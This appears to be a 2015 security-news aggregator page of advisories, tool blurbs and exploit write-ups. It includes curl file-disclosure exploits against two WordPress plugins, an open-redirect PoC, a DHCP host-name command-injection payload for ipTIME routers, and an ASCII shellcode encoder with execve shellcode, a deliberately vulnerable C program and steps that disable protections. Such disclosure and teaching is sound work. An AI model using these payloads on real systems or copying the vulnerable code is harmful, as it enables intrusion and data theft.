Channel: BOT24

Paper: HTML5 Battery Status API enables websites to access the battery state of a mobile device or a laptop

Abstract
We highlight the privacy risks associated with the HTML5 Battery Status API. We put special focus on its implementation in the Firefox browser. Our study shows that websites can discover the capacity of users’ batteries by exploiting the high precision readouts provided by Firefox on Linux. The capacity of the battery, as well as its level, expose a fingerprintable surface that can be used to track web users in short time intervals. Our analysis shows that the risk is much higher for old or used batteries with reduced capacities, as the battery capacity may potentially serve as a tracking identifier. The fingerprintable surface of the API could be drastically reduced without any loss in the API’s functionality by reducing the precision of the readings. We propose minor modifications to the Battery Status API and its implementation in the Firefox browser to address the privacy issues presented in the study. Our bug report for Firefox was accepted and a fix is deployed.

more here..............http://eprint.iacr.org/2015/616.pdf


Source Image: mozilla.org




LFI Vulnerability in Wordpress Plugin mdc-youtube-downloader v2.1.0

Title: LFI in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01
Vendor Contact: n.mukto@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.

Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system, allowing sensitive files to be downloaded:

$file_name = $_GET['file'];

// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
                case 'pdf': $mime = 'application/pdf'; break;
                case 'zip': $mime = 'application/zip'; break;
                case 'jpeg':
                case 'jpg': $mime = 'image/jpg'; break;
                default: $mime = 'application/force-download';
        }
        header('Pragma: public');       // required
        header('Expires: 0');           // no cache
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
        header('Cache-Control: private',false);
        header('Content-Type: '.$mime);
        header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
        header('Content-Transfer-Encoding: binary');
        header('Content-Length: '.filesize($file_name));        // provide file size
        header('Connection: close');
        readfile($file_name);           // push it out
        exit();

CVEID:
OSVDB:

Exploit Code:
$ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd







Thanos- Banner Grabber v1.0.0 beta

Thanos is a tool made for scanning any range of IPs and getting the banners of the running services. The main function is a banner grabber, but you can also use it for exploiting vulnerabilities, finding proxy servers, or simply checking for open ports.

Compile:

You need sqlite3 and pthreads.

$ git clone https://github.com/P0cL4bs/Thanos.git
$ cd Thanos
$ make

Using Thanos

Before starting a scan, you must create a new database file; you can do so by following the example:

$ ./thanos --new-db banner_grabber.db

_____  _      __    _      ___   __
 | |  | |_|  / /\  | |\ | / / \ ( (`
 |_|  |_| | /_/--\ |_| \| \_\_/ _)_)

        Banner Grabber v1.0.0 beta


[+] Creating new database file: banner_grabber.db
[+] Ok
[+] Creating table
[+] Executing query:

create table thanos_scan (
        id INTEGER PRIMARY KEY,
        port INTEGER NOT NULL,
        data TEXT,
        timeout INTEGER,
        limit_download INTEGER
);

[+] Ok
A new database file is created; now you must insert scanner configurations into the database:

$ echo -e "QUIT\n" > /tmp/ftp_scan
$ ./thanos --cfg-db banner_grabber.db \
 --cfg-port 21 \
 --cfg-file /tmp/ftp_scan \
 --cfg-timeout 10 \
 --cfg-limit 300

[...]

[+] Inserting new options to database file
[+] Ok
A new type of scan was inserted into the database: it will scan port 21 and, if it is open, send the contents of the file /tmp/ftp_scan to the port and wait for 10 seconds, or until cfg-limit is reached, or until the server closes the connection.

We can list the scanners in database using the option --list:

$ ./thanos --cfg-db banner_grabber.db --list

[...]

[+] Starting listing rows in database file

[+] ID: 1
[+] Port: 21
[+] Data: 515549540a0a
[+] Timeout: 10
[+] Limit Download: 300

[+] Finish
ID = Scanner ID

Port = Port to check

Data = Content to send

Timeout = Max time of seconds to wait

Limit Download = Max size of bytes to reached

If you want to insert a new scanner, the option --cfg-port is required. If --cfg-file is not set, the value will be NULL; if --cfg-timeout is not set, the value used will be the macro DEFAULT_TIMEOUT; if --cfg-limit is not set, the value used will be the macro DEFAULT_LIMIT_BYTES.

Doing the Scan:

$ ./thanos --cfg-db banner_grabber.db -s 0 -e 0

[...]

Number of scans load: 1
Total IP's to scan: 1

[+] 0.0.0.0:21 open

CHEWB FTP SERVER

-s | --start = IP address to start

-e | --end = IP address to end

IP address samples:

1 = 1.0.0.0

1.2 = 1.2.0.0

1.2.3 = 1.2.3.0

You can configure the banner output using -n (--no-wide) or -D (--hex-dump).

Changing the configuration file:

You can edit the parameters of a configuration entry by setting the option --update-id, for example:

$ ./thanos --cfg-db banner_grabber.db --update-id 1 --cfg-data /dev/null
This changes the Data value.

You can also delete scanner configurations using --delete-id, for example:

$ ./thanos --cfg-db banner_grabber.db --delete-id 1

more here..............https://github.com/P0cL4bs/Thanos



Source Image: geekblogtv

System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to all-powerful System level access. The problem is it doesn’t seem to work anymore, so let’s see what changed and get some plain text passwords while we are at it!

It’s been a while since I have used Metasploit’s Bypass UAC module, and when I went to use it recently it kept erroring out. Once you had a remote shell with Metasploit, all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple: the module usage has changed slightly.

We will start with an active session to a Windows 7 system here...........https://cyberarms.wordpress.com/2015/07/04/system-level-access-and-plain-text-passwords-using-bypass-uac-and-mimikatz/



Emulating Linux MIPS in Perl - Part 1: ELF loader, Part 2: Linux emulation, Part 3: MIPS CPU emulation & Part 4: Bits and Ends and Links

The real reason why I wanted a blog is to be able to talk about interesting things, and sometimes to publish or write about stuff I did that might be interesting to others but wouldn't warrant making a formal release of some software package.

So, today I'll write about a MIPS CPU emulator that emulates just enough of a Linux kernel and enough of an ELF loader to be able to run some statically linked programs.

Uhm, why would one do that, and why in Perl?

To run dash or bash, i.e., some POSIX shell.

Uhm, and why would one want to do that?

Well, to run perl's Configure script of course!

Uhm, and why not use bash directly?

Ah, to run Configure on native windows, to see if staticperl could be made to work with it.

This is quite succinctly the trail of thought that led to this silly project, in reverse order. It was a bit more complicated in proper order.

more here, where you can access all 4 parts of the Emulating Linux MIPS in Perl articles.............http://schplog.schmorp.de/2015-06-08-emulating-linux-mips-in-perl-1.html







White Paper: AWS Best Practices for DDoS Resiliency

Abstract 
This paper is intended for customers who want to improve resiliency of their applications running on Amazon Web Services (AWS) against Distributed Denial of Service attacks. The paper provides an overview of Distributed Denial of Service attacks, techniques that can help maintain availability, and reference architectures to provide architectural guidance with the goal of improving your resiliency. The paper is targeted at IT decision makers and security personnel who are familiar with basic concepts in the area of networking, security, and AWS. Each section has links to AWS documentation with specific information on how to perform the tasks listed.

more here..................http://d0.awsstatic.com/whitepapers/DDoS_White_Paper_June2015.pdf




SpearPhisher

A Web Application to Send and Track Spear Phishing Campaigns.

You can view screenshots and a quick demo video at http://spearphisher.co.uk

SpearPhisher is made up of 3 components.

Django Web Application for Creation and Management.
SMTP Server for sending Emails.
Bottle Web Application for Tracking Responses.

SpearPhisher makes use of the following 3rd-Party components:

jQuery - https://code.jquery.com/
BootStrap - http://getbootstrap.com/
BootStrap Tables - http://bootstrap-table.wenzhixin.net.cn/
SummerNote - http://summernote.org/
FontAwsome - https://fortawesome.github.io/Font-Awesome/
HighCharts - http://www.highcharts.com/

more here....................https://github.com/kevthehermit/SpearPhisher











Identifying and exploiting rom-0 vulnerabilities

I will talk about a simple but dangerous vulnerability present on many network devices that use the RomPager Embedded Web Server. An attacker is able to get your ISP password, wireless password and other sensitive information by issuing a single HTTP GET request to the ‘/rom-0′ URI. The information disclosure is in the RomPager Embedded Web Server itself. Affected devices include ZTE, TP-Link, ZynOS, Huawei and many others. The vulnerability was published in 2014 (judging by the CVE), but I see a lot of people don’t know about it, mainly because there was no hype about it and most of the popular vulnerability scanners fail to identify it.

I still think the vulnerability is pretty dangerous: if the administration web interface of the router is exposed on the Internet, anyone on the Internet can learn your ISP password, wireless password and router password with a single unauthorized HTTP request. But an attacker does not have to stop there: knowing your router password, the attacker can change router settings and redirect your network traffic as he likes (by changing route or DNS settings). The attacker can also expose your LAN to the Internet or access your internal services or computers by abusing port forwarding features. So, I hope this vulnerability will get better treatment after this blog post and NSE script.

more here...............https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/




Intel Assembler 80x86 CodeTable Cheat Sheet

When I made my first steps coding in the programming language Intel Assembly x86 I was looking for a compact list containing all instructions. Because I couldn't find any I created my own cheat sheet:

- includes most instructions (transfer, arithmetic, logic, jumps, ...)
- includes a diagram of the registers (EAX, EDX, ECX, EBX) and flags
- includes source code of a demo program
- handy Quick Reference fits on one single sheet (front & back)

more here....................http://www.jegerlehner.ch/intel/



KINS (or ZeusVM) v2.0.0.0 toolkit (builder & panel source code) leaked - sells for 5K on the black market

KINS (or ZeusVM, to be precise) v2.0.0.0 toolkit (builder & panel) was leaked and spread all over the internet. On Jun 26th 2015 we were informed (thank you Xylit0l) about this and, after several internal discussions, considering that "so many more of the bad guys know about this than good guys", today we decided to raise a warning about this matter with this post. So this is information for those who may not know about the leaked package yet and/or want to have the archive of what has leaked from a trusted source.

Together with this warning, we would also like to inform you that KINS version 3 is on the black market now at a price of 5k, according to a certain crook-affiliated forum.

This is team work: two friends, Xylit0l [link] and unixfreaxjp [link], are on the case building this report, testing, recording, taking screenshots, and taking down sites that spread the leaked packages as much as possible.

What was leaked exactly?

more here.............http://blog.malwaremustdie.org/2015/07/mmd-0036-2015-kins-or-zeusvm-v2000.html




Open redirect vulnerability in StageShow Wordpress plugin v5.0.8

# Title: Open redirect vulnerability in StageShow Wordpress plugin v5.0.8
# Submitter: Nitin Venkatesh
# Product: StageShow Wordpress Plugin
# Product URL: https://wordpress.org/plugins/stageshow
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
# Affected Versions: v5.0.8 and possibly below
# Tested Version: v5.0.8
# Fixed Version: v5.0.9
# Link to source code diff:
https://plugins.trac.wordpress.org/changeset/1165310
# Link to changelog: https://wordpress.org/plugins/stageshow/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information

StageShow adds the facility for an online Box-Office for Small
Theatres/Drama Groups, records sales, validates tickets and provides sales
downloads.

## Vulnerability Description

Open redirect vulnerability in the stageshow_redirect.php file via the url parameter.

## Vulnerable Source Code

$url = urldecode($_GET['url']);
..
Redirect($url, true);

function Redirect($url, $permanent = false)
{
   header('Location: ' . $url, true, $permanent ? 301 : 302);
   die;
}
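The fixed release (v5.0.9) is linked above; as an added example that is not StageShow's code, this is one way to validate the decoded url parameter before it reaches header('Location'): accept only relative paths or absolute http(s) URLs on the site's own host, and fall back to the home page otherwise. $site_host and the helper names are assumptions for the example.

```php
<?php
// Added example, not plugin code. Returns a safe Location target or null.
// $url is the already urldecode()d request parameter, $site_host the host
// this site is served from (assumption for the example).
function safe_redirect_target(string $url, string $site_host): ?string
{
    $url = trim($url);
    if ($url === '') {
        return null;
    }
    // Reject protocol-relative targets (//evil.example) and backslashes,
    // which some browsers treat like "/" when they appear in the authority.
    if (substr($url, 0, 2) === '//' || strpos($url, '\\') !== false) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false) {
        return null;            // unparseable, refuse rather than guess
    }
    // No scheme and no host: a path on this site ("/tickets/?show=1").
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        return $url[0] === '/' ? $url : '/' . $url;
    }
    // Absolute URL: must be http(s) and must name our own host. This also
    // rejects "javascript:", "mailto:" and "http://ourhost@evil.example".
    if (!isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        || strcasecmp($parts['host'], $site_host) !== 0) {
        return null;
    }
    return $url;
}

// Drop-in replacement for the unchecked Redirect($url, true) call above.
function redirect_or_home(string $url, string $site_host, bool $permanent = false): void
{
    $target = safe_redirect_target($url, $site_host) ?? '/';
    header('Location: ' . $target, true, $permanent ? 301 : 302);
    exit;
}

// Usage with the advisory's PoC value (host name is a constructed example):
// redirect_or_home(urldecode($_GET['url'] ?? ''), 'shop.example.org');
```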

## Proof of Concept

Sample exploit GET request:

GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2F2buntu.com

## Solution:

Upgrade to v5.0.9

## Disclosure Timeline:

2015-05-19 - Discovered. Contacted developer on forums
2015-05-20 - Report mailed to developer
2015-05-21 - Update v5.0.9 released
2015-07-05 - Publishing disclosure


## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.






Redis Sniffer v1.1.0- A Redis event sniffer and logging utility

This tool will monitor a specific port and interface for Redis traffic and capture the commands being sent to Redis and/or formatted full TCP dump data. This can be used for analysis, for debugging, or for replaying the transactions as a way of doing real load/performance testing.

Redis Hound must be run locally on a Redis server or a server that is sending commands to Redis.

more here....................https://github.com/jplesperance/redis-sniffer




A fileless Ursnif doing some POS focused reco

At the beginning of June, I noticed a "different" Angler pass: no drop, and Ursnif (multifaceted malware) callbacks.

FileLess Angler Pass and Ursnif Callback


I already encountered that "small Ursnif" multiple times. In November, for instance, an 18k sample was pushed in Bedep 380278c243a03c70dba89af2e6d4916f (grabbing a sample doing some IAP-like callback - 43fce12aace6e73fc7b1e1117595816e).

more here..................http://malware.dontneedcoffee.com/2015/07/a-fileless-ursnif-doing-some-pos.html

Remote File Download Vulnerability in Wordpress Plugin wp-ecommerce-shop-styling v2.5

Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.

Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input, so sensitive system files can be downloaded.


<?php
require_once("../../../../wp-admin/admin.php");

header('Content-disposition: attachment; filename='.$_GET['filename']);
header('Content-type: application/pdf');
readfile(HAET_INVOICE_PATH.$_GET['filename']);
?>

You'll have to rename the downloaded file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd, as the filename is set to the download filename including its path.
CVEID:
OSVDB:
Exploit Code:
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
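Both download.php handlers on this page (mdc-youtube-downloader above and wp-ecommerce-shop-styling here) hand a request parameter straight to readfile(). As an added example that is neither plugin's code, this is a handler that confines the request to one directory: only the basename is honoured, the extension is allow-listed, and the resolved path is checked against realpath() of the allowed directory so a symlink cannot escape it. $allowed_dir, the extension list and the function names are assumptions for the example; the real plugin constant is HAET_INVOICE_PATH.

```php
<?php
// Added example, not plugin code. Resolve a requested download name to a
// file inside $allowed_dir, or return null if it must not be served.
function resolve_download_path(string $allowed_dir, string $requested): ?string
{
    // Keep only the last path component: "../../etc/passwd", "/etc/passwd"
    // and "-..-..-etc-passwd" all collapse to a plain file name.
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // Serve only the types this endpoint exists for (allow-list, not deny-list).
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ['pdf', 'zip', 'jpg', 'jpeg'], true)) {
        return null;
    }
    // realpath() resolves symlinks and ".." and returns false for missing
    // files; then require the result to sit under the allowed directory.
    $base = realpath($allowed_dir);
    $full = realpath($allowed_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;            // a symlink inside the directory pointed outside it
    }
    return $full;
}

// Stream the file with headers derived from the validated path, never from
// the raw request parameter.
function send_download(string $allowed_dir, string $requested): void
{
    $path = resolve_download_path($allowed_dir, $requested);
    if ($path === null) {
        http_response_code(404);
        exit('Not found');
    }
    $mime = ['pdf' => 'application/pdf', 'zip' => 'application/zip',
             'jpg' => 'image/jpeg',      'jpeg' => 'image/jpeg']
            [strtolower(pathinfo($path, PATHINFO_EXTENSION))];
    header('Content-Type: ' . $mime);
    header('Content-Disposition: attachment; filename="'
           . str_replace('"', '', basename($path)) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}

// Usage; the invoice directory is an assumption for this example:
// send_download(__DIR__ . '/invoices', $_GET['filename'] ?? '');
```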




node-thin

node-thin is an HTTP/HTTPS debugging proxy that allows using a collection of middlewares/interceptors to trace, pre-process and post-process requests and responses. In HTTPS mode the proxy can actually simulate a man-in-the-middle (MITM) attack or traffic hijacking. The concept of middlewares is similar to the connect (expressjs) framework.

more here.....................https://github.com/runk/node-thin




Important security upgrades for node.js and io.js

Critical security releases for node.js and io.js

node.js-v0.12.6
io.js-v2.3.3
io.js-v1.8.3
First, the obvious: the handling of this hasn’t been ideal; it would have been nice to take our time and do this more strategically. It’s evening in the USA and it’s the weekend of the 4th of July.

We made the call to push forward because details about the bug and potential exploit have inadvertently made their way to a public forum, so we’d rather give companies and users the tools to protect themselves and mitigate DoS if it happens to become a reality than sit on it and cross our fingers. The timing sucks, particularly for the USA, where it’s hitting the weekend and the whole 4th of July thing makes this a nightmare for people managing large deployments, but this is the call we made with the information available.

more here................https://medium.com/@iojs/important-security-upgrades-for-node-js-and-io-js-8ac14ece5852

and here..............https://github.com/nodejs/io.js/blob/master/CHANGELOG.md


Source Image: node.js.org

127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request

## Advisory Information

Title: 127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request
Advisory URL: https://pierrekim.github.io/advisories/2015-iptime-0x02.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-06-127-iptime-router-models-unauthenticated-RCE-with-DHCP.html
Date Published: 2015-07-06
Vendors contacted: None
Release mode: Released 0Day
CVE: None



## Product Description

EFMNetworks ipTIME is the largest Korean brand of SOHO/small/middle enterprise routers/WiFi APs/modems/firewalls in South Korea, with millions of devices deployed in the country. EFMNetworks ipTIME occupies more than 60 percent of the personal network device market. There are approximately 10 000 000 ipTIME devices deployed in South Korea.



## Vulnerability Summary

This vulnerability allows an attacker to bypass the admin authentication and get direct RCE from the LAN side with a single DHCP request.

This is a direct RCE against the routers which gives complete root access to the embedded Linux from the LAN side.

It affects 127 ipTIME products from 2009-era firmwares to the current firmware (9.66, build time 2015-06-11) with the default configuration:


  - ipTIME a1004
  - ipTIME a1004v
  - ipTIME a104
  - ipTIME a104ns
  - ipTIME a104r
  - ipTIME a2004
  - ipTIME a2004ns
  - ipTIME a2004r
  - ipTIME a2008
  - ipTIME a3004
  - ipTIME a3004ns
  - ipTIME a5004ns
  - ipTIME a604
  - ipTIME a604v
  - ipTIME extac
  - ipTIME extd2
  - ipTIME g1
  - ipTIME g104
  - ipTIME g104a
  - ipTIME g104be
  - ipTIME g104i
  - ipTIME g104m
  - ipTIME g204
  - ipTIME g501
  - ipTIME g504
  - ipTIME ipsmart
  - ipTIME mini
  - ipTIME mobap1
  - ipTIME multi
  - ipTIME n1
  - ipTIME n104
  - ipTIME n104a
  - ipTIME n104ar1
  - ipTIME n104i
  - ipTIME n104k
  - ipTIME n104ktt
  - ipTIME n104m
  - ipTIME n104p
  - ipTIME n104q
  - ipTIME n104r
  - ipTIME n104r3
  - ipTIME n104rsk
  - ipTIME n104s
  - ipTIME n104sr1
  - ipTIME n104t
  - ipTIME n104v
  - ipTIME n104vlg
  - ipTIME n1e
  - ipTIME n1eky
  - ipTIME n1p
  - ipTIME n2
  - ipTIME n2e
  - ipTIME n2p
  - ipTIME n3004
  - ipTIME n5
  - ipTIME n5004
  - ipTIME n504
  - ipTIME n5r1
  - ipTIME n6004
  - ipTIME n6004m
  - ipTIME n6004r
  - ipTIME n604
  - ipTIME n604a
  - ipTIME n604i
  - ipTIME n604m
  - ipTIME n604p
  - ipTIME n604r
  - ipTIME n604s
  - ipTIME n604t
  - ipTIME n604v
  - ipTIME n604vlg
  - ipTIME n608
  - ipTIME n7004ns
  - ipTIME n702bcm
  - ipTIME n704
  - ipTIME n704a
  - ipTIME n704a3
  - ipTIME n704bcm
  - ipTIME n704lg
  - ipTIME n704m
  - ipTIME n704mlg
  - ipTIME n704ns
  - ipTIME n704s
  - ipTIME n704v
  - ipTIME n704v3
  - ipTIME n8004
  - ipTIME n8004r
  - ipTIME n8004v
  - ipTIME n804
  - ipTIME n804a
  - ipTIME n804a3
  - ipTIME n804t
  - ipTIME n804t3
  - ipTIME n804v
  - ipTIME n904
  - ipTIME n904ns
  - ipTIME n904v
  - ipTIME ng104
  - ipTIME ng304
  - ipTIME ntq104
  - ipTIME ntv108
  - ipTIME ntv116
  - ipTIME ntv124
  - ipTIME q1
  - ipTIME q304
  - ipTIME q504
  - ipTIME q604
  - ipTIME t1004
  - ipTIME t1008
  - ipTIME t16000
  - ipTIME t2008
  - ipTIME t24000
  - ipTIME t3004
  - ipTIME t3008
  - ipTIME timeve
  - ipTIME tq204
  - ipTIME tv104
  - ipTIME v1016
  - ipTIME v1024
  - ipTIME v304
  - ipTIME v308
  - ipTIME v504
  - ipTIME wre1
  - ipTIME x3003
  - ipTIME x3007
  - ipTIME x5007
  - ipTIME x6003


The probability that firmware 9.68 (the last firmware for these specific models) running on the products below is vulnerable is VERY high:


  - ipTIME q304
  - ipTIME q1
  - ipTIME q504
  - ipTIME ew302
  - ipTIME n702bcm
  - ipTIME a3004ns
  - ipTIME a5004ns


Given the high CVSS score (10/10) of the vulnerability, the number of affected devices and the longevity of this vulnerability (6+ years old), ipTIME users are urged to contact ipTIME.



## Details

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in ipTIME devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field.

Sending a DHCP request with this parameter will reboot the device:

cat /etc/dhcp/dhclient.conf

  send host-name ";/sbin/reboot";

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device; the DHCP request immediately forces a reboot of the remote device:


Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[...]
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).

Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change:  / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan  1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan  1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
Jan  1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback
Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change:  / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback
Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- ---> Plantynet Event : 00000003
- ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE


[sending the DHCP request]


[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan  1
00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.

Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Reboot Result from Watchdog Timeout!

- ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->


[...]




An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root.

From my tests, it is possible to use this vulnerability to overwrite the firmware with a custom (backdoored) firmware.



## Vendor Response

From my experience, contacting EFMNetworks ipTIME proved to be useless. They don't publish security information in the changelog, they don't answer security researchers and they don't credit them either. EFMNetworks ipTIME was not contacted in regard to this case.



## Report Timeline

 * Jun 02, 2014: Vulnerability found by Pierre Kim.
 * Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs.
 * Jun 25, 2015: Vulnerability confirmed on all the existing versions from 2009 to 2015 including the last firmware version (9.66).
 * Jul 06, 2015: A public advisory is sent to security mailing lists.



## Credit

This vulnerability was found by Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-iptime-0x02.txt



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/



Working with base64 (Video Included)

Last week I received another malicious document with embedded payload encoded with base64. A bit tired of repeating the same manual operations to extract and decode base64 content, I quickly wrote a small Python script to help me.

more here..................https://isc.sans.edu/diary/Working+with+base64/19873





Ascii Shell Generator to bypass MSB data filters for buffer overflow exploits on Intel platforms

Buffer overflows aim to execute carefully chosen machine-native instructions on a target system. That code is a series of bytes that cross the full range of possible values. Unfortunately for many attackers, certain servers filter out or modify any values outside the range 21 to 7F hex. Examples are web proxies and e-mail servers that cannot handle non-printable ASCII values in their data. Their input filters mangle the incoming exploit code, and as a result destroy its functionality.

I posed a challenge to several hackers one Saturday night, and this paper is the result. The algorithm presented here will encode any sequence of binary data into ASCII characters that, when interpreted by an Intel processor, will decode the original sequence and execute it.

More information about this technique is in the Riley "caezar" Eller publication:
Compile the AsciiShellGen program:
$ make && make clean
Usage:
# ./AsciiShellGen
usage: AsciiShellGen <esp offset> <nop sleed from loader to shellcode> <shellcode in hexastring "\xOP\xOP"...>

Example with setuid(0) & execve(/bin/sh,0,0) shellcode:
# ./AsciiPolyEng -270 10  "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"
TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP

Injection in vulnerable program in a buffer of 512 bytes:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

/* Deliberately vulnerable: strcpy() copies an attacker-controlled string
   into a 512-byte stack buffer with no length check. */
int foo(char *str)
{
    char buffer[512];
    printf("[buffer addr] 0x%x: %s\n\n", &buffer, str);
    strcpy(buffer, str);
    return 0;
}

int main(int argc, char *argv[])
{
    if(argc != 2)
        exit(0);
    foo(argv[1]);
    return 0;
}

Compile the vulnerable program without the memory protections against stack buffer overflow exploits:
#gcc -fno-pie -fno-stack-protector -z execstack -m32 -g vuln.c -o vuln
Set the set-uid root bit on the program:
#chown root:users vuln
#chmod u+s vuln
#ls -l vuln
-rwsr-xr-x 1 root users 7068 Jul 6 02:37 vuln
Deactivate ASLR:
#echo 0 > /proc/sys/kernel/randomize_va_space
Inject the shellcode into the buffer and overwrite the return address:
